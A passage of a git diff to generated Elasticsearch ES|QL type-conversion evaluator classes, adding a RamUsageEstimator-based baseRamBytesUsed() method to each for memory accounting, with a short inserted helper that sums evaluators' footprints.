
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java
index ad6171cf36bd4..751bdb3e02d0d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToGeoShapeFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToGeoShapeFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator in;

   public ToGeoShapeFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in,
@@ -116,6 +119,13 @@ public void close() {
     Releasables.closeExpectNoException(in);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java
index 9cabd771d979b..4437ba384844c 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToIntegerFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromBooleanEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator bool;

   public ToIntegerFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool,
@@ -99,6 +102,13 @@ public void close() {
     Releasables.closeExpectNoException(bool);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += bool.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java
index 1d1f979306871..5dd8fa0d680ec 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToIntegerFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromDoubleEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator dbl;

   public ToIntegerFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl,
@@ -114,6 +117,13 @@ public void close() {
     Releasables.closeExpectNoException(dbl);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += dbl.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java
index 8a318985ccd2c..39f3b7b625d89 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToIntegerFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator lng;

   public ToIntegerFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng,
@@ -114,6 +117,13 @@ public void close() {
     Releasables.closeExpectNoException(lng);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lng.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java
index 1c7f11c9340ae..82af737109967 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToIntegerFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator in;

   public ToIntegerFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in,
@@ -117,6 +120,13 @@ public void close() {
     Releasables.closeExpectNoException(in);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java
index 8580f6a4d3fb5..8c68dad7f7641 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToIntegerFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromUnsignedLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator ul;

   public ToIntegerFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator ul,
@@ -114,6 +117,13 @@ public void close() {
     Releasables.closeExpectNoException(ul);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += ul.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java
index 79bec661413ef..a6ab4d571d9c0 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToLongFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromBooleanEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator bool;

   public ToLongFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool,
@@ -99,6 +102,13 @@ public void close() {
     Releasables.closeExpectNoException(bool);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += bool.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java
index 050eb1bc7c2c9..2e6c1d62f088e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToLongFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromDoubleEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator dbl;

   public ToLongFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl,
@@ -114,6 +117,13 @@ public void close() {
     Releasables.closeExpectNoException(dbl);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += dbl.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java
index be940034e8ae4..cb557168758c8 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToLongFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromIntEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator i;

   public ToLongFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i,
@@ -99,6 +102,13 @@ public void close() {
     Releasables.closeExpectNoException(i);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += i.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java
index 96264da153be2..bd40ad246dd7f 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator in;

   public ToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in,
@@ -117,6 +120,13 @@ public void close() {
     Releasables.closeExpectNoException(in);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java
index 51fec7b143d34..22bde8237da01 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToLongFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromUnsignedLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator ul;

   public ToLongFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator ul,
@@ -113,6 +116,13 @@ public void close() {
     Releasables.closeExpectNoException(ul);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += ul.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java
index 77dcc52f9f6e6..fd7d6b446f220 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -20,6 +21,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToRadiansEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToRadiansEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator deg;

   public ToRadiansEvaluator(Source source, EvalOperator.ExpressionEvaluator deg,
@@ -98,6 +101,13 @@ public void close() {
     Releasables.closeExpectNoException(deg);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += deg.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java
index 3a056a59218ce..37f34626c8989 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromBooleanEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator bool;

   public ToStringFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool,
@@ -100,6 +103,13 @@ public void close() {
     Releasables.closeExpectNoException(bool);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += bool.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java
index b7eb970c4bdba..748b7168449d9 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromCartesianPointEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromCartesianPointEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator wkb;

   public ToStringFromCartesianPointEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb,
@@ -120,6 +123,13 @@ public void close() {
     Releasables.closeExpectNoException(wkb);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkb.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java
index 2c0523c9b27b3..b93a4b0178f11 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromCartesianShapeEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromCartesianShapeEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator wkb;

   public ToStringFromCartesianShapeEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb,
@@ -120,6 +123,13 @@ public void close() {
     Releasables.closeExpectNoException(wkb);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkb.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
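Since every evaluator now self-reports the same metric, a caller that holds a batch of compiled evaluators can estimate their combined overhead with a simple fold. A hypothetical caller-side helper, not part of this change (EvalOperator.ExpressionEvaluator is the interface from the diffs; the method name is illustrative):

// Hypothetical aggregation helper: sums the self-reported base footprint of
// a batch of evaluators, e.g. to feed a memory-accounting decision.
static long totalBaseRamBytesUsed(java.util.List<EvalOperator.ExpressionEvaluator> evaluators) {
  long total = 0;
  for (EvalOperator.ExpressionEvaluator evaluator : evaluators) {
    total += evaluator.baseRamBytesUsed();
  }
  return total;
}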
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java
index 22d596d5b19ae..521968dbd1855 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromDateNanosEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromDateNanosEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator datetime;

   public ToStringFromDateNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator datetime,
@@ -100,6 +103,13 @@ public void close() {
     Releasables.closeExpectNoException(datetime);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += datetime.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java
index 0422df62556f8..0e6c7aae086dc 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromDatetimeEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromDatetimeEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator datetime;

   public ToStringFromDatetimeEvaluator(Source source, EvalOperator.ExpressionEvaluator datetime,
@@ -100,6 +103,13 @@ public void close() {
     Releasables.closeExpectNoException(datetime);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += datetime.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
